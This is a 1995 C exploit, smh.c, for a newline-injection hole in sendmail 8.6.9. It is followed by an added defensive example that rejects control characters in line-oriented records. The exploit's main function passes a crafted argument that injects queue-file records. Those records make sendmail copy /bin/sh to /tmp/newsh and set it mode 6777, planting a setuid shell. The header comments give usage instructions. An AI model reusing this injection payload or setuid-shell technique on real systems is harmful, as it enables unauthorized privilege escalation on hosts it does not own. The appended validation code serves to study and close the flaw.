C/C++ Source or Header | 2001-11-06 | 1KB | 40 lines
/* smh.c - Michael R. Widner - atreus (2/27/95)
* <widner@uchicago.edu> <atreus@primus.com>
* a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
* hole. It's really just a matter of passing newlines in arguments to
* sendmail and getting the stuff into the queue files. If we run this
* locally with -odq we are guaranteed that it will be queued, rather than
* processed immediately. Wait for the queue to get processed automatically
* or just run sendmail -q if you're impatient.
* usage: smh [ username [/path/to/sendmail]]
* It's worth noting that this is generally only good for getting bin.
* sendmail still wants to process the sendmail.cf file, which contains
* Ou1 and Og1 most of the time, limiting you to bin access. Is there
* a way around this?
* cc -o smh smh.c should do the trick. This just creates a bin owned
* mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some
* systems this is pretty much worthless, but you're smart enough to know
* which systems those are. Aren't you?
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
main(argc, argv)
int argc;
char **argv;
{
    execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
    "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ",
    argv[1] ? argv[1] : "atreus",0);
}
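
The root cause named in the header comment, a newline inside an argument reaching a line-oriented queue file, is shown below next to the check that closes it. This is an added example, not part of smh.c or of sendmail; the function names, the `X` record tag and the sample value are constructed for illustration.

```c
#include <stdio.h>

/* Naive writer (the flaw): copies the value into a one-record-per-line
 * buffer without checking it. Returns bytes written or -1 on overflow. */
int write_record_naive(char *buf, size_t cap, const char *tag, const char *value)
{
    int n = snprintf(buf, cap, "%s%s\n", tag, value);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* 1 if value has no CR, LF or other control byte, so it cannot end the
 * current record and begin another one. */
int value_is_single_line(const char *value)
{
    const unsigned char *p;
    for (p = (const unsigned char *)value; *p; p++)
        if (*p < 0x20 || *p == 0x7f)
            return 0;
    return 1;
}

/* Hardened writer: refuses values that would span more than one record. */
int write_record_checked(char *buf, size_t cap, const char *tag, const char *value)
{
    if (!value_is_single_line(value))
        return -1;
    return write_record_naive(buf, cap, tag, value);
}

/* Number of records a line-oriented reader would parse from buf. */
int count_records(const char *buf)
{
    int n = 0;
    for (; *buf; buf++)
        if (*buf == '\n')
            n++;
    return n;
}

int main(void)
{
    char buf[128];
    const char *sample = "ascii\nXone\nXtwo";   /* constructed, harmless input */

    write_record_naive(buf, sizeof buf, "$r", sample);
    printf("naive:   %d records from one argument\n", count_records(buf));
    printf("checked: %d\n", write_record_checked(buf, sizeof buf, "$r", sample));
    printf("benign:  %d bytes\n", write_record_checked(buf, sizeof buf, "$r", "ascii"));
    return 0;
}
```

The naive writer turns one command-line value into three records; the checked writer rejects it at the trust boundary, before anything is serialized.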